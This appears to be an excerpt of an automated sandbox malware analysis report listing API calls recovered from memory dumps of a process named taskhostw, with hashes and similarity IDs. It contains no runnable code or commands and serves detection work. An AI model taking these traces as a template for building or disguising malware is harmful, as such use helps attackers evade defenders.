                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00214353
                                                                  • LoadStringW.USER32(00000000), ref: 0021435A
                                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00214370
                                                                  • LoadStringW.USER32(00000000), ref: 00214377
                                                                  • _wprintf.LIBCMT ref: 0021439D
                                                                  • MessageBoxW.USER32 ref: 002143BB
                                                                  Strings
                                                                  • %s (%d) : ==> %s: %s %s, xrefs: 00214398
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: HandleLoadModuleString$Message_wprintf
                                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                                  • API String ID: 3648134473-3128320259
                                                                  • Opcode ID: 5cd0727407dda030b91c0ed86586a69dbaaf9be11e63fe50e8af2725da89ea02
                                                                  • Instruction ID: 265febb56e2086ccf0c45f494cf6d99fa3bc45fd86acded8bc25d8e3aa3781c5
                                                                  • Opcode Fuzzy Hash: 5cd0727407dda030b91c0ed86586a69dbaaf9be11e63fe50e8af2725da89ea02
                                                                  • Instruction Fuzzy Hash: BB014FF2900208BFE791ABA4BE89EE6776CD708301F1005A6BB59E2051EA749E954F71
                                                                  APIs
                                                                  • ShowWindow.USER32(FFFFFFFF,?), ref: 001B2ACF
                                                                  • ShowWindow.USER32(FFFFFFFF,00000000), ref: 001B2B17
                                                                  • ShowWindow.USER32(FFFFFFFF,00000006), ref: 001EC39A
                                                                  • ShowWindow.USER32(FFFFFFFF,?), ref: 001EC406
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: ShowWindow
                                                                  • String ID:
                                                                  • API String ID: 1268545403-0
                                                                  • Opcode ID: 436317c9aceebbdf16960bd9a62aceb352af0c57fb4eca1740e92f0cb471f171
                                                                  • Instruction ID: c4bf6841c362f75df2c4838f4f49dd80f91ed610f28e2a9000bcb6efd0d39d8c
                                                                  • Opcode Fuzzy Hash: 436317c9aceebbdf16960bd9a62aceb352af0c57fb4eca1740e92f0cb471f171
                                                                  • Instruction Fuzzy Hash: 3F412C31604BC09BC7399B399D8CBEFBB95BB45300F25C81DE047879A0C774A88AD751
                                                                  APIs
                                                                  • DeleteObject.GDI32(00000000), ref: 0023621D
                                                                  • GetDC.USER32(00000000), ref: 00236225
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A,?,?,0023905C,?,?,000000FF,00000000,?,000000FF,?,00000001,?), ref: 00236230
                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0023623C
                                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00236278
                                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00236289
                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 002362C3
                                                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 002362E3
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                  • String ID:
                                                                  • API String ID: 3864802216-0
                                                                  • Opcode ID: 6e13ace78bde3842dc35e1df3113fe7909999673414ecf08529133e887876a64
                                                                  • Instruction ID: a642f72bf3dd2e2b8c2700cfaf0e0f26a48c9e7d7dc03b61bf8cf103f934dd81
                                                                  • Opcode Fuzzy Hash: 6e13ace78bde3842dc35e1df3113fe7909999673414ecf08529133e887876a64
                                                                  • Instruction Fuzzy Hash: 04319C72610210BFEB118F54ED8AFEB3BADEF09721F044065FE089A291C7759C51CBA4
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: _memcmp
                                                                  • String ID:
                                                                  • API String ID: 2931989736-0
                                                                  • Opcode ID: 15f0f6386b2101db337efd48204956996102700c164b9a85bc4e5a5f22c31147
                                                                  • Instruction ID: 531e550e012b52d64a9649e2d4292a6289066ae90f8170956d49ef61a68434ab
                                                                  • Opcode Fuzzy Hash: 15f0f6386b2101db337efd48204956996102700c164b9a85bc4e5a5f22c31147
                                                                  • Instruction Fuzzy Hash: 9B218EF16802097FAA04A6219EA1F7F776DAE2034CF040426FD0997641FFA5EE15C6B9
                                                                  APIs
                                                                    • Part of subcall function 001B9997: __itow.LIBCMT ref: 001B99C2
                                                                    • Part of subcall function 001B9997: __swprintf.LIBCMT ref: 001B9A0C
                                                                    • Part of subcall function 001CFE06: _wcscpy.LIBCMT ref: 001CFE29
                                                                  • _wcstok.LIBCMT ref: 0021ED20
                                                                  • _wcscpy.LIBCMT ref: 0021EDAF
                                                                  • _memset.LIBCMT ref: 0021EDE2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                  • String ID: X
                                                                  • API String ID: 774024439-3081909835
                                                                  • Opcode ID: 08c4a1010a83b174a9169049f8616af7e5013ddfb4e1799bb33c1c3a99659818
                                                                  • Instruction ID: 23c0acd6d2c01a69c6c8da838f1677bf95ea543c836e19f2681ed580bf138709
                                                                  • Opcode Fuzzy Hash: 08c4a1010a83b174a9169049f8616af7e5013ddfb4e1799bb33c1c3a99659818
                                                                  • Instruction Fuzzy Hash: D1C1A2315183019FCB24EF24C881A9EB7E5FFA5310F11492DF899972A2DB30ED55CB82
                                                                  APIs
                                                                  • __swprintf.LIBCMT ref: 02ABBD1C
                                                                  • __swprintf.LIBCMT ref: 02ABBD5F
                                                                    • Part of subcall function 02A57341: _memmove.LIBCMT ref: 02A57382
                                                                  • __swprintf.LIBCMT ref: 02ABBDB3
                                                                    • Part of subcall function 02A72C18: __woutput_l.LIBCMT ref: 02A72C71
                                                                  • __swprintf.LIBCMT ref: 02ABBE01
                                                                    • Part of subcall function 02A72C18: __flsbuf.LIBCMT ref: 02A72C93
                                                                    • Part of subcall function 02A72C18: __flsbuf.LIBCMT ref: 02A72CAB
                                                                  • __swprintf.LIBCMT ref: 02ABBE50
                                                                  • __swprintf.LIBCMT ref: 02ABBE9F
                                                                  • __swprintf.LIBCMT ref: 02ABBEEE
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: __swprintf$__flsbuf$__woutput_l_memmove
                                                                  • String ID:
                                                                  • API String ID: 1085135966-0
                                                                  • Opcode ID: e0c50845bf7fce6c681f2f3d95343b021b16bc13d9f9b35811af3bc83757c636
                                                                  • Instruction ID: bbd52894c26e8c278622950fa7659be3ea4f83686351cacb55bc17daaa6d046a
                                                                  • Opcode Fuzzy Hash: e0c50845bf7fce6c681f2f3d95343b021b16bc13d9f9b35811af3bc83757c636
                                                                  • Instruction Fuzzy Hash: 2DA11CB1448314AFC754EB64DE85DAFB7EDAF98704F404929F98682190EF34D948CF62
                                                                  APIs
                                                                  • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00226D16
                                                                  • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00226D37
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00226D4A
                                                                  • htons.WSOCK32(?,?,?,00000000,?), ref: 00226E00
                                                                  • inet_ntoa.WSOCK32(?), ref: 00226DBD
                                                                    • Part of subcall function 0020ABF4: _strlen.LIBCMT ref: 0020ABFE
                                                                    • Part of subcall function 0020ABF4: _memmove.LIBCMT ref: 0020AC20
                                                                  • _strlen.LIBCMT ref: 00226E5A
                                                                  • _memmove.LIBCMT ref: 00226EC3
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                  • String ID:
                                                                  • API String ID: 3619996494-0
                                                                  • Opcode ID: af024f8600642d1cda867918c5febed43aba8ac779bbb4d4245b147dc3bf23bb
                                                                  • Instruction ID: d9d5bce08935e201c51c8b35b53a81943c55d8b6c4d65b8d7b19069c4d864aaf
                                                                  • Opcode Fuzzy Hash: af024f8600642d1cda867918c5febed43aba8ac779bbb4d4245b147dc3bf23bb
                                                                  • Instruction Fuzzy Hash: 2281FB32514310ABC710EF64EC8AFAFB7E9EB94714F104919F5559B2A2DB70ED01CB92
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscmp$_wcsstr
                                                                  • String ID: @
                                                                  • API String ID: 3312506106-2766056989
                                                                  • Opcode ID: db69b5071b4f03b89492a660c4e426a08a7858e4c390d033fde3beadfa727160
                                                                  • Instruction ID: 8688b184422a4844200c144f112fe2d7a49f3c79dbfa3d2f0c87a47315ef30f4
                                                                  • Opcode Fuzzy Hash: db69b5071b4f03b89492a660c4e426a08a7858e4c390d033fde3beadfa727160
                                                                  • Instruction Fuzzy Hash: EE8190310042069BEB15DF14C9E4FAA7BF9EF44318F04856AED859B096DF34D94ACBA1
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 0023631E
                                                                  • GetWindowLongW.USER32(009025E8,000000F0), ref: 00236351
                                                                  • GetWindowLongW.USER32(009025E8,000000F0), ref: 00236386
                                                                  • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 002363B8
                                                                  • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 002363E2
                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 002363F3
                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000000,?,?,?,00239E6E,?,?,?,?), ref: 0023640D
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: LongWindow$MessageSend
                                                                  • String ID:
                                                                  • API String ID: 2178440468-0
                                                                  • Opcode ID: 94553352fc84efcef92f4cce72c1d0c2c5c9d6e2bbd0a490a7f0fd51a8ecf1e3
                                                                  • Instruction ID: 45c2f179d10c636eeb4686063b78281d0edddb6ec711180747b06411ceabd714
                                                                  • Opcode Fuzzy Hash: 94553352fc84efcef92f4cce72c1d0c2c5c9d6e2bbd0a490a7f0fd51a8ecf1e3
                                                                  • Instruction Fuzzy Hash: 6331F570A14251AFDB21CF18ED89F5537E9FB4AB10F1981A4F5148F2B2CB61AC909F51
                                                                  APIs
                                                                    • Part of subcall function 00227EA0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00227ECB
                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 002262DC
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 002262EB
                                                                  • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00226324
                                                                  • connect.WSOCK32(00000000,?,00000010), ref: 0022632D
                                                                  • WSAGetLastError.WSOCK32 ref: 00226337
                                                                  • closesocket.WSOCK32(00000000), ref: 00226360
                                                                  • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00226379
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                  • String ID:
                                                                  • API String ID: 910771015-0
                                                                  • Opcode ID: 838e501f50881252da190a59c9614b5092a28a726f571e3b24b85b4648fe6247
                                                                  • Instruction ID: 9457127d0890b8a9133124c766345784fbc47325b23c16fd6d16775c38f5c2ac
                                                                  • Opcode Fuzzy Hash: 838e501f50881252da190a59c9614b5092a28a726f571e3b24b85b4648fe6247
                                                                  • Instruction Fuzzy Hash: 5331C432610129BFDB10DFA4ED89BBE7BA9EB44720F044169FD0597291DB74AC148BA1
                                                                  APIs
                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,001D41D2,?), ref: 001D4123
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 001D412A
                                                                  • EncodePointer.KERNEL32(00000000), ref: 001D4136
                                                                  • DecodePointer.KERNEL32(00000001,001D41D2,?), ref: 001D4153
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                  • String ID: RoInitialize$combase.dll
                                                                  • API String ID: 3489934621-340411864
                                                                  • Opcode ID: e91da8dc369c6596a6e25092e527707ab6b011950daa4ec88c7a0528de230db6
                                                                  • Instruction ID: a17936cf7e070cd1479a06cdd54c1aa5e4dc6dcbcd9bfea3705e2762221c391d
                                                                  • Opcode Fuzzy Hash: e91da8dc369c6596a6e25092e527707ab6b011950daa4ec88c7a0528de230db6
                                                                  • Instruction Fuzzy Hash: 3EE01A70BA0340EFEB509B72FD4DB043BA4A756B02F908464B449D61A0CBB59184EF00
                                                                  APIs
                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,001D40F8), ref: 001D41F8
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 001D41FF
                                                                  • EncodePointer.KERNEL32(00000000), ref: 001D420A
                                                                  • DecodePointer.KERNEL32(001D40F8), ref: 001D4225
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                  • String ID: RoUninitialize$combase.dll
                                                                  • API String ID: 3489934621-2819208100
                                                                  • Opcode ID: b7704a3ab39d7e18ec4309a66070dcddf65abe5455ef3c3882e4fa1e6960aafb
                                                                  • Instruction ID: 8952f06d75fd70b82846122b20f6e5ff8c268afd407aa2c6823e603d41828ad5
                                                                  • Opcode Fuzzy Hash: b7704a3ab39d7e18ec4309a66070dcddf65abe5455ef3c3882e4fa1e6960aafb
                                                                  • Instruction Fuzzy Hash: 47E0B670AD1300EBEB50DB71FE4DB053BE4B704743F904075F119E11A0CBB68644EA11
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove$__itow__swprintf
                                                                  • String ID:
                                                                  • API String ID: 3253778849-0
                                                                  • Opcode ID: 83bfb1693cc3b69e8bd11e3b96494f3007bffb072c759ef512c500f0d887bf46
                                                                  • Instruction ID: d2a9c76e076322e70bd6b4e5552d2d016994a9c376560953e44f733b3c7a89be
                                                                  • Opcode Fuzzy Hash: 83bfb1693cc3b69e8bd11e3b96494f3007bffb072c759ef512c500f0d887bf46
                                                                  • Instruction Fuzzy Hash: 39619B7194026AAFCB12EF60CD80EFF37AAAF05308F444559ED566B292EF34A945CF50
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove$__itow__swprintf
                                                                  • String ID:
                                                                  • API String ID: 3253778849-0
                                                                  • Opcode ID: 747d5336aec051d9d4647c1544dfa5bf5c665d96edbc8748b4b8b21033730896
                                                                  • Instruction ID: 46ffd9cf03b7bd5d0a94b3b0d1268235397ab27f0761c0be15c078a588211ab8
                                                                  • Opcode Fuzzy Hash: 747d5336aec051d9d4647c1544dfa5bf5c665d96edbc8748b4b8b21033730896
                                                                  • Instruction Fuzzy Hash: 4061AD3051065A9BCF12EF20CC86FFE77A9AF68308F044559F9555B2D2DB34AD62CB90
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscmp
                                                                  • String ID:
                                                                  • API String ID: 856254489-0
                                                                  • Opcode ID: 33cd0ae8853705823ff7dd7a1eda622cdde04badbdf09edc531c5b295a380b95
                                                                  • Instruction ID: 0d15adc76e4e5ba6036eccd9830ffae4cd531649a012aceb0f41c1a98a8e71d3
                                                                  • Opcode Fuzzy Hash: 33cd0ae8853705823ff7dd7a1eda622cdde04badbdf09edc531c5b295a380b95
                                                                  • Instruction Fuzzy Hash: 525177B24483849BC725DB94DD909DFB3EDAF89310F00496EE589D3152EF35A18CCB66
                                                                  APIs
                                                                    • Part of subcall function 001B7F41: _memmove.LIBCMT ref: 001B7F82
                                                                    • Part of subcall function 00230EA5: CharUpperBuffW.USER32(?,?), ref: 00230EBC
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00230348
                                                                  • RegOpenKeyExW.ADVAPI32 ref: 00230388
                                                                  • RegCloseKey.ADVAPI32(?), ref: 002303AB
                                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 002303D4
                                                                  • RegCloseKey.ADVAPI32(?), ref: 00230417
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00230424
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                  • String ID:
                                                                  • API String ID: 4046560759-0
                                                                  • Opcode ID: 3c4eb40b3a48c0365f1996948527f1b54440c6afd48460b9a29cc9bbb972e099
                                                                  • Instruction ID: 7aa4da51d237d518564355e7d82c04cac6b15b609dba0cade2bda46d3df2bc39
                                                                  • Opcode Fuzzy Hash: 3c4eb40b3a48c0365f1996948527f1b54440c6afd48460b9a29cc9bbb972e099
                                                                  • Instruction Fuzzy Hash: D2517971228200AFC714EF64D895EAFBBE9FF88314F04491DF585872A2DB71E915CB62
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: __i64tow__itow__swprintf
                                                                  • String ID:
                                                                  • API String ID: 421087845-0
                                                                  • Opcode ID: 39ac969a5d36b17aba07e8c64723978f0bb42c4465549b3cb08dc9d925fed958
                                                                  • Instruction ID: 18de5fd66eb489b84d22a8954e7185328a39d134e0073544f01e2d23c2522396
                                                                  • Opcode Fuzzy Hash: 39ac969a5d36b17aba07e8c64723978f0bb42c4465549b3cb08dc9d925fed958
                                                                  • Instruction Fuzzy Hash: 0541E672944315DFEB24AB34DE81A77B7F9EF04304F2044AEE949D6281EF359841CB54
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
